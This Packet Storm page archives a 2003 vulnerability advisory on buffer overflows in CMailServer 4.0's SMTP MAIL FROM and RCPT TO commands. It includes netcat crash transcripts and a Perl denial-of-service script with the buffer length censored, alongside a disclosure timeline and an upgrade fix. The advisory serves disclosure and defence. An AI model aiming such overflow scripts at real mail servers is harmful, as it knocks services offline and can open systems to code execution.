Twenty Year Anniversary

cmail-vuln.txt

cmail-vuln.txt
Posted May 12, 2003
Authored by Dennis Rand | Site Infowarfare.dk

A buffer overflow exists in the ESMTP CMailServer 4.0.2002.11.24 SMTP Service, resulting in a denial of service attack. It is possible to overwrite the exception handler on the stack allowing a system compromise with code execution running as SYSTEM.

tags | advisory, denial of service, overflow, code execution
MD5 | 190616081f26e58539f1d58a70e3c95a

cmail-vuln.txt

Change Mirror Download
                    Multiple Buffer Overflow Vulnerabilities
Found in CMailServer 4.0
http://www.youngzsoft.com

Discovered by Dennis Rand
www.Infowarfare.dk
------------------------------------------------------------------------


-----[SUMMARY
CMailServer, a small and easy to administer email server software and web
mail server software, can help you build your own email server for
Win NT/2000/XP. It enables you to send and receive email across the
Internet or within your LAN. The ESMTP authentication, ASP form web
mail and multiple domain names are supported.

CMailServer offers an unlimited email users license at a reasonable
and affordable price compared to other email server software.
For those small to medium sized companies, CMailServer will be an
economic and effective solution to handle their e-mail management
requirements. CMailServer also is a web mail server software and
provides full web mail service. The web mail is based on ASP.
You can customize your web mail interface freely. Give it a try
and find out how easy it is to build an email server and web mail
server for your own business.


The problem is a Buffer Overflow in the SMTP protocol, within the
ESMTP CMailServer 4.0.2002.11.24 SMTP Service, causing the service to
shutdown.
It is possible to actually overwrite the exception handler on the stack
allowing
A system compromise with code execution running as SYSTEM.


-----[AFFECTED SYSTEMS
Vulnerable systems:
* ESMTP CMailServer 4.0.2003.03.27 SMTP Service

Immune systems:
* ESMTP CMailServer 4.0.2003.03.30 SMTP Service

-----[SEVERITY
High - An attacker is able to cause a DoS attack on the SMTP
protocol.
And we can actually overwrite the exception handler on the
stack
Allowing a system compromise with code execution running as
SYSTEM.


-----[DESCRIPTION OF WHAT THE VULNERABILITY IS
The Vulnerability is a Buffer Overflow in the ESMTP CMailServer
4.0.2002.11.24 SMTP Service
When a malicious attacker sends a large amount into the "MAIL FROM" and the
"RCPT TO"
The buffer will overflow. If the code was carefully crafted, attackers could
execute
Arbitrary command in system privilege.

The following transcript demonstrates a sample exploitation of the
Vulnerabilities:
----------------------------- [Transcript] -----------------------------
nc warlab.dk 25
220 ESMTP CMailServer 4.0.2003.03.27 SMTP Service Ready
HELO Foobar
250 win2k-serv
Mail From : <aaaaa....[Buffer size 2000 Bytes @warlab.dk]
<Connection closed>

The same Vulnerability is in the RCPT TO
nc warlab.dk 25
220 ESMTP CMailServer 4.0.2003.03.27 SMTP Service Ready
HELO Foobar
250 win2k-serv
Mail From : admin@warlab.dk
250 <admin@warlab.dk> Sender Ok
Rcpt To: <aaaaa....[Buffer size 2000 Bytes @warlab.dk]
<connection closed>
----------------------------- [Transcript] -----------------------------

----------------------------- [Exploit Code] -----------------------------
#!/usr/bin/perl -w
##################
# ESMTP CMailServer 4.0.2003.03.27 SMTP Service DoS attack
#
# URL: http://www.infowarfare.dk/
# EMAIL: der@infowarfare.dk
# USAGE: sploit.pl <target ip>
#
# Summary:
#
# The problem is a Buffer Overflow in the SMTP protocol, within the
# ESMTP CMailServer, causing the service to shutdown
# It is then where we can actually overwrite the exception handler on the
stack allowing
# A system compromise with code execution running as SYSTEM.
#
#
# Ive censored some of the source code out. =)
#
# Solution:
# None at this time
#
#

use IO::Socket;

$target = shift() || "warlab.dk";
my $port = 25;
my $Buffer = "A" x <CENSORED> ; #


my $sock = IO::Socket::INET->new (
PeerAddr => $target,
PeerPort => $port,
Proto => 'tcp'
) || die "could not connect: $!";

my $banner = <$sock>;
if ($banner !~ /^2.*/)
{
print STDERR "Error: invalid server response '$banner'.\n";
exit(1);
}

print $sock "HELO $target\r\n";
$resp = <$sock>;

print $sock "MAIL FROM: $Buffer\@$target.dk\r\n";
$resp = <$sock>;

print $sock "\r\n";
print $sock "\r\n\r\n\r\n\r\n\r\n\r\n";

close($sock);
----------------------------- [Exploit Code] -----------------------------



-----[DETECTION
ESMTP CMailServer 4.0.2003.03.27 SMTP Service is vulnerable to the
above-described attacks.
Earlier versions may be susceptible as well. To determine if a specific
implementation is vulnerable, experiment by following the above transcript.


-----[WORK AROUNDS
Upgrade as soon as possible to version -> ESMTP CMailServer 4.0.2003.03.30
SMTP Service
or later.
The other workaround is to disable the SMTP service but that is not fun.

-----[VENDOR RESPONSE
Quoting YoungZSoft <yaoer@youngzsoft.com>:
I thank you very very much for your report.
We will fix this as soon as possible
Yaoer

-----[DISCLOSURE TIMELINE
24/04/2003 Found the Vulnerability, and made an analysis.
29/04/2003 Contacted Vendor at support@youngzsoft.net
30/04/2003 Received response from vendor with a fix to test
01/05/2003 New version tested negative for the vulnerabilities
10/05/2003 Public Disclosure.


-----[ADDITIONAL INFORMATION
The vulnerability was discovered and reported by <der@infowarfare.dk> Dennis
Rand

-----[DISCLAIMER
The information in this bulletin is provided "AS IS" without warranty of any
kind.
In no event shall we be liable for any damages whatsoever including direct,
indirect,
incidental, consequential, loss of business profits or special damages.




Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

Want To Donate?


Bitcoin: 18PFeCVLwpmaBuQqd5xAYZ8bZdvbyEWMmU

File Archive:

April 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    5 Files
  • 2
    Apr 2nd
    17 Files
  • 3
    Apr 3rd
    11 Files
  • 4
    Apr 4th
    21 Files
  • 5
    Apr 5th
    17 Files
  • 6
    Apr 6th
    12 Files
  • 7
    Apr 7th
    1 Files
  • 8
    Apr 8th
    6 Files
  • 9
    Apr 9th
    21 Files
  • 10
    Apr 10th
    18 Files
  • 11
    Apr 11th
    42 Files
  • 12
    Apr 12th
    7 Files
  • 13
    Apr 13th
    14 Files
  • 14
    Apr 14th
    1 Files
  • 15
    Apr 15th
    1 Files
  • 16
    Apr 16th
    15 Files
  • 17
    Apr 17th
    20 Files
  • 18
    Apr 18th
    24 Files
  • 19
    Apr 19th
    20 Files
  • 20
    Apr 20th
    7 Files
  • 21
    Apr 21st
    10 Files
  • 22
    Apr 22nd
    2 Files
  • 23
    Apr 23rd
    17 Files
  • 24
    Apr 24th
    35 Files
  • 25
    Apr 25th
    14 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close